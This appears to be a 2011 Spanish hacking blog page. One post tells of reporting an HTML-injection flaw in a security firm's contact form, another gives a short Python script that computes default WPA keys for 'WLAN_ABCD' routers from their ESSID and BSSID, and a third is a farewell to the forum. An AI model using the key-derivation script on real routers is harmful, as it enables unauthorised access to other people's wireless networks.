Publicado el 21/10/2011 12:10:00 en Hacking Web. Total de votos: 8 Votar
Hola a todos, antes de nada decir que por culpa de este teclado no puedo acentuar.
Bueno hoy revisando mis privados de twitter vi una vieja conversacion de Julio con kevin Mitnick de cuando le reportara un HTMLi en su web, encontrado por JKS un dia que nos propusimos ownear alguien 'importante' o algo asi xD.
Bueno os voy a contar un poco cmo fue la historia:
Contactamos con su empresa con el formulario de contacto pero como no nos contestaron pues mencione a Mitnick en un tweet, advirtiendole de la existencia de dicho fallo.
Entonces mantuvimos esta conversacion por privado, y le envie el reporte del fallo en un paste:
EL contenido del paste donde reportaba la vulnerabilidad es este:
In the contact form (https://mitnicksecurity.com/contact.php) on the textbox email is not filtered some html tags in textbox; something like ""> <marquee> <h1> Bug by 0&J </ h1 > hh </ marquee> "if you clik on submit (no need to type the captcha) that content isn't filtered and is executed. This is the code wiewed on the sorce code after submit.
"<td valign="bottom" nowrap><input type="Text" name="strEmail" size="41" maxlength="50" ID="Text10" value="\"><marquee><h1>Bug by 0&J</h1>hh</marquee>">"
Image form the bug:
https://img833.imageshack.us/img833/9376/mitnick.png
If some content untroduce java or a XSS payload jumps that kind of " WAF " provided by the host, and makes it more difficult to exploit but it is better to have it fixed. I think i can exploit it with a simple php code.
The bug isn't critical xD, but is better fix it
And one more thing I can't exploit yet: I think you can dos your wbe with a a self-DOS or DOS launched from google, but still I have to look further.
I'm trying found something more :P.
Tath's all.
Greets, JKS&0verflow
Sorry by my english :(
Como leisteis en la imagenes nos pidio nuestras direcciones para enviarnos su nuevo libro como muestra de agradecimiento.... No lo hizo xD
EDIT
Como MuldeR me dijo, le recordé el asuntillo del libro, esto es lo que me dijo:
Bueno, esto es todo!
Saludos! Y saludos especiales a JKS que no me quiere.
23 comments
Read more ...
Publicado el 17/10/2011 12:10:00 en Hacking Wireless. Total de votos: 6 Votar
Basandome en el algoritmo descubierto por seguridadwireless.
Un script sencillito del todo, pero mas que nada para quien no conozca este algoritmo que sirve para hallar la pass de los ruters 'WLAN_ABCD'
#!/usr/bin/python
#Hallar clave WPA ruters Jazztel y Movistar
#Coded by 0verflow
import md5
ESSID=raw_input("ESSID del ruter: ")
#Ej ESSID: WLAN_ABCD
BSSID=raw_input("BSSID del ruter: ")
#Ej BSSID A1:B2:C3:D4:09
bssid=BSSID.replace(":","")
bssid1=bssid.replace(bssid[-4],ESSID[-4])
bssid1=bssid.replace(bssid[-3],ESSID[-3])
bssid1=bssid.replace(bssid[-2],ESSID[-2])
bssid1=bssid.replace(bssid[-1],ESSID[-1])
concatenacion="bcgbghgg"+bssid1+bssid
cript=md5.new()
cript.update(concatenacion)
final=cript.hexdigest()
clave=final[0:19]
print "La clave segun el algoritmo es:", clave
PD:He vuelto
13 comments
Read more ...
Publicado el 07/07/2011 12:07:00 en Off Topic.
6 comments
Read more ...
Publicado el 21/06/2011 12:06:00 en Off Topic.
Me encantó conocer a gente como la que conocí en esta comunidad. No voy a dar nombres porque ellas saben quienes son. Dejo esto a un lado por culpa de gente que indirectamente me ha creado mala fama y no me ha traido más que mala reputación. Y porque ya considero una pérdida de tiempo cualquier contenido que aquí publique.
Los primeros meses que estuve aquí me gustaron, la comunidad se movía y había buen rollo pero ahora no és lo mismo.
Al principio me molaba el rollo "Ah eres 0verflow de diosdelared"! Ahora más que un privilegio es una verguenza. Me da mucha lástima que una comunidad como esta se valla a pique tan rápido, esto si se hiciese de otro modo podría estar más que bien pero entiendo que MuldeR no tiene tiempo y los imperios caidos son difíciles de levantar.
Estuve 10 meses muy productivos en esta comunidad, a la cual llegué sin apenas saber que era un lenguaje de programación ni saber porqué cuando metía un %27 en una url me tiraba "You have an error in your SQL syntax "lo que ahorá es música para mis oídos. Y más que sobre seguridad (cosa que me apasiona cada día más), aprendí algo de ética relaccionado con este tema y a no ser como determinados users a los cuales todos conocemos y no teclearé su nombre.
Seguiré aprendiendo por mi cuenta y espero encontrarme por el camino con grandes personas con las que tuve la oportunidad de conocer hasta ahora y con las que no pierdo el contacto, de las cuales he aprendido gran parte de lo que sé, y no me cansaré de decir que yo no sé nada que mi conocimiento son cosas tomadas de otras personas que realmente saben y que tuve la suerte de leer y almacenarlas en mi cabeza. Y de todos modos sigo sabiendo muy poco o nada, pero lo que sí seguiré poniéndole tanto interés como asta hoy
Soy un n00b y doy gracias de serlo para poder aprender cada día algo nuevo.
Me alegraría mucho volver a entrar a esta comunidad y ver el orden, las fluidez de contenidos y el trigo limpio que habia antes. Esto ahora no es más que un montón de paja con trigo sucio por el medio.
Yo seguiré por mi cuenta, los que me quieran encontrar sabrán dónde.
Ojalá un día de estos que vuelva a estar todo como hace unos meses me apetezca borrar este artículo y publicar cosas.
Tras esta despedida "melancólica" solo tengo dos cosas más que decir.
Ante todos los colegas, me quito el sombrero.
Con los que no he tenido la oportunidad de platicar o han tenido mal rollo
0 comments
Read more ...
Publicado el 06/06/2011 12:06:00 en Off Topic.
2 comments
Read more ...